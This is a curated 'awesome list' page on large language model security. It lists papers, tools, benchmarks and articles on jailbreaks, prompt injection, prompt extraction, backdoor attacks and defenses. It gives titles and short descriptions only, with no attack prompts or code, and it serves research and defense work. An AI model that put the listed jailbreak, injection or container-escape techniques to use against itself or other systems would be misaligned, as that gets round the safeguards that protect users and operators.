awesome-llm-security

LLM Security Resources

Curation of resources and tools related to security vulnerabilities in large language models.

A curation of awesome tools, documents and projects about LLM Security.

GitHub

985 stars

33 watching

99 forks

last commit: 11 months ago

Linked from 2 awesome lists

awesomeawesome-listllmsecurity

Awesome LLM Security / Papers / White-box attack
[paper]			"Visual Adversarial Examples Jailbreak Large Language Models", 2023-06, AAAI(Oral) 24, ,
[paper]			"Are aligned neural networks adversarially aligned?", 2023-06, NeurIPS(Poster) 23, ,
[paper]			"(Ab)using Images and Sounds for Indirect Instruction Injection in Multi-Modal LLMs", 2023-07,
[paper]			"Universal and Transferable Adversarial Attacks on Aligned Language Models", 2023-07, ,
[paper]			"Jailbreak in pieces: Compositional Adversarial Attacks on Multi-Modal Language Models", 2023-07, ,
[paper]			"Image Hijacking: Adversarial Images can Control Generative Models at Runtime", 2023-09, ,
[paper]			"Weak-to-Strong Jailbreaking on Large Language Models", 2024-04, ,
Awesome LLM Security / Papers / Black-box attack
[paper]			"Not what you've signed up for: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection", 2023-02, AISec@CCS 23
[paper]			"Jailbroken: How Does LLM Safety Training Fail?", 2023-07, NeurIPS(Oral) 23,
[paper]			"Latent Jailbreak: A Benchmark for Evaluating Text Safety and Output Robustness of Large Language Models", 2023-07,
[paper]			"Effective Prompt Extraction from Language Models", 2023-07, ,
[paper]			"Multi-step Jailbreaking Privacy Attacks on ChatGPT", 2023-04, EMNLP 23, ,
[paper]			"LLM Censorship: A Machine Learning Challenge or a Computer Security Problem?", 2023-07,
[paper]			"Jailbreaking chatgpt via prompt engineering: An empirical study", 2023-05,
[paper]			"Prompt Injection attack against LLM-integrated Applications", 2023-06,
[paper]			"MasterKey: Automated Jailbreak Across Multiple Large Language Model Chatbots", 2023-07, ,
[paper]			"GPT-4 Is Too Smart To Be Safe: Stealthy Chat with LLMs via Cipher", 2023-08, ICLR 24, ,
[paper]			"Use of LLMs for Illicit Purposes: Threats, Prevention Measures, and Vulnerabilities", 2023-08,
[paper]			"Do-Not-Answer: A Dataset for Evaluating Safeguards in LLMs", 2023-08,
[paper]			"Detecting Language Model Attacks with Perplexity", 2023-08,
[paper]			"Open Sesame! Universal Black Box Jailbreaking of Large Language Models", 2023-09, ,
[paper]			"Fine-tuning Aligned Language Models Compromises Safety, Even When Users Do Not Intend To!", 2023-10, ICLR(oral) 24,
[paper]			"AutoDAN: Generating Stealthy Jailbreak Prompts on Aligned Large Language Models", 2023-10, ICLR(poster) 24, , ,
[paper]			"Jailbreak and Guard Aligned Language Models with Only Few In-Context Demonstrations", 2023-10, CoRR 23, ,
[paper]			"Multilingual Jailbreak Challenges in Large Language Models", 2023-10, ICLR(poster) 24,
[paper]			"Scalable and Transferable Black-Box Jailbreaks for Language Models via Persona Modulation", 2023-11, SoLaR(poster) 24,
[paper]			"DeepInception: Hypnotize Large Language Model to Be Jailbreaker", 2023-11,
[paper]			"A Wolf in Sheep’s Clothing: Generalized Nested Jailbreak Prompts can Fool Large Language Models Easily", 2023-11, NAACL 24,
[paper]			"AutoDAN: Automatic and Interpretable Adversarial Attacks on Large Language Models", 2023-10,
[paper]			"Language Model Inversion", 2023-11, ICLR(poster) 24,
[paper]			"An LLM can Fool Itself: A Prompt-Based Adversarial Attack", 2023-10, ICLR(poster) 24,
[paper]			"GPTFUZZER: Red Teaming Large Language Models with Auto-Generated Jailbreak Prompts", 2023-09,
[paper]			"Many-shot Jailbreaking", 2024-04,
[paper]			"Rethinking How to Evaluate Language Model Jailbreak", 2024-04,
Awesome LLM Security / Papers / Backdoor attack
[paper]			"BITE: Textual Backdoor Attacks with Iterative Trigger Injection", 2022-05, ACL 23,
[paper]			"Prompt as Triggers for Backdoor Attack: Examining the Vulnerability in Language Models", 2023-05, EMNLP 23,
[paper]			"Backdooring Instruction-Tuned Large Language Models with Virtual Prompt Injection", 2023-07, NAACL 24,
Awesome LLM Security / Papers / Fingerprinting
[paper]			"Instructional Fingerprinting of Large Language Models", 2024-01, NAACL 24
[paper]			"TRAP: Targeted Random Adversarial Prompt Honeypot for Black-Box Identification", 2024-02, ACL 24 (findings)
[paper]			"LLMmap: Fingerprinting For Large Language Models", 2024-07,
Awesome LLM Security / Papers / Defense
[paper]			"Baseline Defenses for Adversarial Attacks Against Aligned Language Models", 2023-09,
[paper]			"LLM Self Defense: By Self Examination, LLMs Know They Are Being Tricked", 2023-08, ICLR 24 Tiny Paper, ,
[paper]			"Defending Against Alignment-Breaking Attacks via Robustly Aligned LLM", 2023-09, ,
[paper]			"Benchmarking and Defending Against Indirect Prompt Injection Attacks on Large Language Models", 2023-12,
[paper]			"AutoDefense: Multi-Agent LLM Defense against Jailbreak Attacks", 2024-03,
[paper]			"Protecting Your LLMs with Information Bottleneck", 2024-04,
[paper]			"PARDEN, Can You Repeat That? Defending against Jailbreaks via Repetition", 2024-05, ICML 24,
[paper]			“Adversarial Tuning: Defending Against Jailbreak Attacks for LLMs”, 2024-06,
[paper]			"Improving Alignment and Robustness with Circuit Breakers", 2024-06, NeurIPS 24, ,
Awesome LLM Security / Papers / Platform Security
[paper]			"LLM Platform Security: Applying a Systematic Evaluation Framework to OpenAI’s ChatGPT Plugins", 2023-09,
Awesome LLM Security / Papers / Survey
[paper]			"Survey of Vulnerabilities in Large Language Models Revealed by Adversarial Attacks", 2023-10, ACL 24,
[paper]			"Security and Privacy Challenges of Large Language Models: A Survey", 2024-02,
[paper]			"Breaking Down the Defenses: A Comparative Survey of Attacks on Large Language Models", 2024-03,
[paper]			"Operationalizing a Threat Model for Red-Teaming Large Language Models (LLMs)", 2024-07,
Awesome LLM Security / Benchmark
[paper]			"JailbreakBench: An Open Robustness Benchmark for Jailbreaking Large Language Models", 2024-03,
[paper]			"AgentDojo: A Dynamic Environment to Evaluate Attacks and Defenses for LLM Agents", 2024-06, NeurIPS 24,
[paper]			"AgentHarm: A Benchmark for Measuring Harmfulness of LLM Agents", 2024-10,
Awesome LLM Security / Tools
Plexiglass	122	almost 2 years ago	: a security toolbox for testing and safeguarding LLMs
PurpleLlama	2,791	11 months ago	: set of tools to assess and improve LLM security
Rebuff	1,144	about 1 year ago	: a self-hardening prompt injection detector
Garak	3,043	11 months ago	: a LLM vulnerability scanner
LLMFuzzer	238	over 1 year ago	: a fuzzing framework for LLMs
LLM Guard	1,296	11 months ago	: a security toolkit for LLM Interactions
Vigil	326	over 1 year ago	: a LLM prompt injection detection toolkit
jailbreak-evaluation	20	12 months ago	: an easy-to-use Python package for language model jailbreak evaluation
Prompt Fuzzer	419	about 1 year ago	: the open-source tool to help you harden your GenAI applications
WhistleBlower	114	about 1 year ago	: open-source tool designed to infer the system prompt of an AI agent based on its generated text outputs
Awesome LLM Security / Articles
Hacking Auto-GPT and escaping its docker container
Prompt Injection Cheat Sheet: How To Manipulate AI Language Models
Indirect Prompt Injection Threats
Prompt injection: What’s the worst that can happen?
OWASP Top 10 for Large Language Model Applications
PoisonGPT: How we hid a lobotomized LLM on Hugging Face to spread fake news
ChatGPT Plugins: Data Exfiltration via Images & Cross Plugin Request Forgery
Jailbreaking GPT-4's code interpreter
Securing LLM Systems Against Prompt Injection
The AI Attack Surface Map v1.0
Adversarial Attacks on LLMs
How Anyone can Hack ChatGPT - GPT4o
LLM Evaluation metrics, frmaework, and checklist
How RAG Poisoning Made Llama3 Racist!
Awesome LLM Security / Other Awesome Projects
https://0din.ai			(0din GenAI Bug Bounty from Mozilla)( ): The 0Day Investigative Network is a bug bounty program focusing on flaws within GenAI models. Vulnerability classes include Prompt Injection, Training Data Poisoning, DoS, and more
Gandalf			: a prompt injection wargame
LangChain vulnerable to code injection - CVE-2023-29374
LLM Security startups	2	12 months ago
Adversarial Prompting
Epivolis			: a prompt injection aware chatbot designed to mitigate adversarial efforts
LLM Security Problems at DEFCON31 Quals	124	over 2 years ago	: the world's top security competition
PromptBounty.io
PALLMs (Payloads for Attacking Large Language Models)	70	over 1 year ago
Awesome LLM Security / Other Useful Resources
@llm_sec			Twitter:
LLM Security			Blog: authored by
Embrace The Red			Blog:
Kai's Blog			Blog:
AI safety takes			Newsletter:
Hackstery			Newsletter & Blog:

awesome-llm-security

Awesome LLM Security / Papers / White-box attack

Awesome LLM Security / Papers / Black-box attack

Awesome LLM Security / Papers / Backdoor attack

Awesome LLM Security / Papers / Fingerprinting

Awesome LLM Security / Papers / Defense

Awesome LLM Security / Papers / Platform Security

Awesome LLM Security / Papers / Survey

Awesome LLM Security / Benchmark

Awesome LLM Security / Tools

Awesome LLM Security / Articles

Awesome LLM Security / Other Awesome Projects

Awesome LLM Security / Other Useful Resources

Backlinks from these awesome lists:

More related projects: